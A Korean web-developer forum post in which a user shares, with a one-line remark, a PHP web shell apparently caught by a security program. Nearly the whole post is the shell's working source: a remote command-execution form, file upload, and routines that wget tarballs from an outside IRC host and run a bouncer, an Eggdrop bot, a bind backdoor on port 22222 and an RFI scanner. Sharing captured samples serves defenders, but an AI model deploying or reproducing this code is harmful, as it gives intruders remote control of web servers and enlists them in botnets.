포럼

  2. Support
  3. 포럼

해커의 흔적.

2013.07.22 05:52

엘카

?><html><head>

<style type="text/css">

<!--

body,table { font-family:verdana;font-size:11px;color:white;background-color:black; }

table { width:100%; }

table,td { border:1px solid #808080;margin-top:2;margin-bottom:2;padding:5px; }

a { color:lightblue;text-decoration:none; }

a:active { color:#00FF00; }

a:link { color:#5B5BFF; }

a:hover { text-decoration:underline; }

a:visited { color:#99CCFF; }

input,select,option { font:8pt tahoma;color:#FFFFFF;margin:2;border:1px solid #666666; }

textarea { color:#dedbde;font:8pt Courier New;border:1px solid #666666;margin:2; }

input[type="submit"] { border:1px solid #000000; }

input[type="text"] { padding:3px;}

input,select,option,input[type="submit"]:hover { background-color:#333333; }

textarea { background-color:#000000; }

// -->

</style>

<title>-LampungCyber Community-</title>

</head>

<body><center><hr noshade size=1><h2>diKi Simple Shell Injectionz v0.01</h2><p>

<hr noshade size=1>

Thanks to : arch_fajri - lampungcarding - chandra35 - singkong @ irc.bandarlampung.us</center></p>

<hr noshade size=1>


<?php

error_reporting(4);

$sh_mainurl = "http://www.bandarlampung.us/irc/";

$sh_sourcez = array(

  "dQ99Sh"   => array($sh_mainurl."readme.txt","kiddie.php"),

  "dQBNC"   => array($sh_mainurl."dQBNC.tar.gz","dQBNC.tar.gz"),

  "Eggdrop"  => array($sh_mainurl."allnet.tar.gz","allnet.tar.gz"),

  "BindDoor" => array($sh_mainurl."proxy.tgz","proxy.tgz"),

  "RFIScaN" => array($sh_mainurl."404.txt","error.txt"),

);


if (safemode()) { $dsafe = "<font color=#3366FF><b>ON</b></font>"; }

else { $dsafe = "<font color=#3366FF><b>OFF</b></font>"; }


echo "Safe     : $dsafe OS: ".info(php_uname())."<br>".

     "Software : ".info(getenv("SERVER_SOFTWARE"))."<br>".

     "Userid   : ".info(aJ99exec("id"))."<br>".

     "IP Target: ".info(gethostbyname($_SERVER["HTTP_HOST"]))."<br>".

     "IP Anda  : ".info($_SERVER["REMOTE_ADDR"])."<br>";

if (isset($_POST['dir'])) {

  $dir = $_POST['dir'];

  if (!@chdir($dir)) { echo "Ga bisa masuk $dir | "; }

}

else { $dir = getcwd(); }

echo "Direktory: $dir ";

if (is_writable($dir)) { echo "[Writable]"; } else { echo "[Readonly]"; }

?>


<hr noshade size=1>

<center>

<textarea cols=130 rows=20>


<?php


if (empty($_POST['portpsy'])) { $portpsy = 27071; }

if (empty($_POST['bip'])) { $bip = gethostbyname($_SERVER["HTTP_HOST"]); }

if (isset($_POST['bot1'])) {

  $chan1 = $_POST['channel1'];

  $sirc1 = $_POST['serverirc1'];

  echo "Downloading Scanbot 1..\n";

  echo aJ99exec("cd /dev/shm;wget ".$sh_sourcez["RFIScaN"][0]);

  echo "Loading RFI Scanbot.. $chan1 at $sirc1 $port1\n";

  echo aJ99exec("cd /dev/shm;perl ".$sh_sourcez["RFIScaN"][1]." $chan1 $sirc1 $port1;");

}

elseif (isset($_POST['psy'])) {

  $portpsy = $_POST['portpsy'];

  echo aJ99exec("wget ".$sh_sourcez["dQBNC"][0].";tar -zxf ".$sh_sourcez["dQBNC"][1]);

  echo aJ99exec("cd .dQBNC;./config admin $portpsy;./fuck;./run");

}

elseif (isset($_POST['egg'])) {

  $bf = $_POST['bf'];

  $bnick = $_POST['bnick'];

  $bident = $_POST['bident'];

  $bip = $_POST['bip'];

  $bchan = $_POST['bchan'];

  $bowner = $_POST['bowner'];

  echo aJ99exec("wget ".$sh_sourcez["Eggdrop"][0].";tar -zxf ".$sh_sourcez["Eggdrop"][1]);

  echo aJ99exec('cd .allnet;./dhie '.$bf.' '.$bnick.' '.$bident.' '.$bip.' '.$bchan.' '.$bowner);

  echo aJ99exec('cd .allnet;./dssl '.$bf.';cd scripts;./autobotchk '.$bf.' -noemail -5');

elseif (isset($_POST['eggrun'])) {

  $bf = $_POST['bf'];

  $bnick = $_POST['bnick'];

  $bident = $_POST['bident'];

  $bip = $_POST['bip'];

  $bchan = $_POST['bchan'];

  $bowner = $_POST['bowner'];

  echo aJ99exec('cd .allnet;./dhie '.$bf.' '.$bnick.' '.$bident.' '.$bip.' '.$bchan.' '.$bowner);

  echo aJ99exec('cd .allnet;./dssl '.$bf.';cd scripts;./autobotchk '.$bf.' -noemail -5');

}

elseif (isset($_POST['bind'])) {

  echo aJ99exec("wget ".$sh_sourcez["BindDoor"][0].";tar -zxf ".$sh_sourcez["BindDoor"][1].";cd pro;./prox -d -a -p22222");

}

elseif (isset($_POST['cmd'])) {

  $cmdtxt = $_POST['cmdtxt'];

  $ret = aJ99exec($cmdtxt); echo htmlspecialchars($ret);

}


?>

</textarea>

</center>

<hr noshade size=1>

<!-- <form enctype="multipart/form-data" action="" method="POST">

<input type="hidden" name="MAX_FILE_SIZE" value="100000" />

UPLOAD File: <input name="file" type="file" />

<input type="submit" value="UPLOAD" />

</form> -->

<hr noshade size=1>

<form method="POST" enctype="multipart/form-data">

<input type=hidden name="dir" value="<?php echo $dir; ?>">

Direktori: <input type="text" size=40 value="<?php echo $dir; ?>" name="dir" />

Command: <input type="text" size=80 value="<?php echo $cmdtxt; ?>" name="cmdtxt" />

<input type="submit" value="Execute" name="cmd" /><br>

</form>

<!-- <hr noshade size=1>

<form method="POST" enctype="multipart/form-data">

<input type=hidden name="dir" value="<?php echo $dir; ?>">

Port: <input type="text" size=6 value="<?php echo $portpsy; ?>" name="portpsy" />

<input type="submit" value="dQBNC" name="psy" />

<input type="submit" value="Elite Proxy" name="bind" />

</form> -->

<hr noshade size=1>

<hr noshade size=1>

<form method="POST" enctype="multipart/form-data">

<input type=hidden name="dir" value="<?php echo $dir; ?>">

<strong>Install EggDrop : </strong><p>

File: <input type="text" size=10 value="<?php echo $bf; ?>" name="bf" />

Nick: <input type="text" size=10 value="<?php echo $bnick; ?>" name="bnick" />

Ident: <input type="text" size=10 value="<?php echo $bident; ?>" name="bident" />

IP: <input type="text" size=10 value="<?php echo $bip; ?>" name="bip" />

Chan: <input type="text" size=10 value="<?php echo $bchan; ?>" name="bchan" />

Owner: <input type="text" size=10 value="<?php echo $bowner; ?>" name="bowner" />

<input type="submit" value="Install Eggdrop" name="egg" />

<input type="submit" value="Load Eggdrop" name="eggrun" />

</form>

<hr noshade size=1>

<hr noshade size=1>

<!-- <form method="POST" enctype="multipart/form-data">

<input type=hidden name="dir" value="<?php echo $dir; ?>">

Chan: <input type="text" size=6 value="<?php echo $channel1; ?>" name="channel1" />

Server: <input type="text" value="<?php echo $serverirc1; ?>" name="serverirc1" />

Port: <input type="text" value="<?php echo $port1; ?>" name="port1" />

<input type="submit" value="RFIBotScaN" name="bot1" />

</form> -->

<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">

<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>

<?php

if( $_POST['_upl'] == "Upload" ) {

if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload OK!!!</b><br><br>'; }

else { echo '<b>Upload FAILED!!!</b><br><br>'; }

}

?>

<?php


function info($txt){ return "<font color=lime>".$txt."</font>"; }

###########################

## aJ99Sh CORE FUNCTIONS ##

###########################

function safemode() {

  if ( @ini_get("safe_mode") OR eregi("on",@ini_get("safe_mode")) ) { return TRUE; }

  else { return FALSE; }

}

function getdisfunc() {

  $disfunc = @ini_get("disable_functions");

  if (!empty($disfunc)) {

    $disfunc = str_replace(" ","",$disfunc);

    $disfunc = explode(",",$disfunc);

  }

  else { $disfunc= array(); }

  return $disfunc;

}

function enabled($func) {

 if ( is_callable($func) && !in_array($func,getdisfunc()) ) { return TRUE; }

 else { return FALSE; }

}

function aJ99exec($cmd) {

  $output = "";

  if ( enabled("popen") ) {

    $h = popen($cmd.' 2>&1', 'r');

    if ( is_resource($h) ) {

      while ( !feof($h) ) { $output .= fread($h, 2096);  }

      pclose($h);

    }

  }

  elseif ( enabled("passthru") ) { @ob_start(); passthru($cmd); $output = @ob_get_contents(); @ob_end_clean(); }

  elseif ( enabled("shell_exec") ) { $output = shell_exec($cmd); }

  elseif ( enabled("exec") ) { exec($cmd,$o); $output = join("\r\n",$o); }

  elseif ( enabled("system") ) { @ob_start(); system($cmd); $output = @ob_get_contents(); @ob_end_clean(); }


  else { $output = "NULL"; }

  return $output;

}

function aJ99exec2($cmd) {

  $output = "";

  if ( enabled("system") ) { @ob_start(); system($cmd); $output = @ob_get_contents(); @ob_end_clean(); }

  elseif ( enabled("exec") ) { exec($cmd,$o); $output = join("\r\n",$o); }

  elseif ( enabled("shell_exec") ) { $output = shell_exec($cmd); }

  elseif ( enabled("passthru") ) { @ob_start(); passthru($cmd); $output = @ob_get_contents(); @ob_end_clean(); }

  elseif ( enabled("popen") ) {

    $h = popen($cmd.' 2>&1', 'r');

    if ( is_resource($h) ) {

      while ( !feof($h) ) { $output .= fread($h, 2096);  }

      pclose($h);

    }

  }

  return $output;

}


die();

?><?



보안 프로그램에 걸린 해커의 흔적

이 게시물을

http://elkha.kr/

좋아요(+6)
목록
글쓴이 제목 최종 글
데미갓 xe_menu 와 xe_menu_item 테이블이 계속 증가합니다. [6] 2013.01.29 by 데미갓
音志 XE 의 게시판 들은 하나 같이 공통점이... [5] 2013.01.28 by misol
컴토피아 이건 버그일까요, 컨셉일까요 [2] 2013.01.28 by 컴토피아
데벨 Exif 애드온 1.5.4.2 버전에서 동작하나요? [20] file 2013.01.28 by 상자님
Jabezp xe마켓 해외 결제 문제.... [6] 2013.01.28 by Jabezp
데미갓 xe 사용시 myisam 과 innodb 의 코딩 차이?  
누리안 1.5.0에서는 댓글 삭제 속도가 빨라집니까? [5] 2013.01.28 by 데미갓
착한악마 [해결함]1.5.4.1 설치후 저 같은경우가 있는분~~ [35] file 2013.01.28 by jinoossi
컴토피아 XE에도 네이버 형태의 포토뷰어가 있나요? [4] file 2013.01.26 by 컴토피아
라미아스튜디오 카페24 사용자분들..혹시 글쓰기시 잘못된 요청입니다 나오는분 없나요? [26] 2013.01.25 by Garon
音志 1.7에서는 제발 XE CSS를 고쳐주세요 [12] 2013.01.24 by Goos
KTK 모바일의 버그 이슈등록은했지만... [1] 2013.01.24 by 미노아
KANTSOFT xe통함검색을 하면 검색결과에 트위터 + 구글맞춤검색도 나오게 하기.. [17] file 2013.01.24 by LI-NA
컴토피아 MS WPI에서의 XE [4] 2013.01.23 by 컴토피아
퍼니엑스이 XE 1.7 나오면 또 걱정이네요. [9] 2013.01.23 by 라미아스튜디오
라미아스튜디오 XE마켓이 바뀌었으면 하는점... [10] 2013.01.23 by 라미아스튜디오
iDog 모듈 Admin View에서 게시판 목록을 출력하고자 합니다. [2] 2013.01.23 by iDog
해커다 [가시영역의 이미지만 로딩]이거 XE에 맞게 만든거 없나요? [13] 2020.03.14 by 꿈틀잉
본체 코어업데이트랑 다 끝나고 모듈도 최신버전으로 올렸는데요 [2] file 2013.01.22 by 본체
zero 말 한 마디로 천냥 빚도 갚는다라고 했습니다만... [38] 2013.01.22 by donit2
태그 쓰기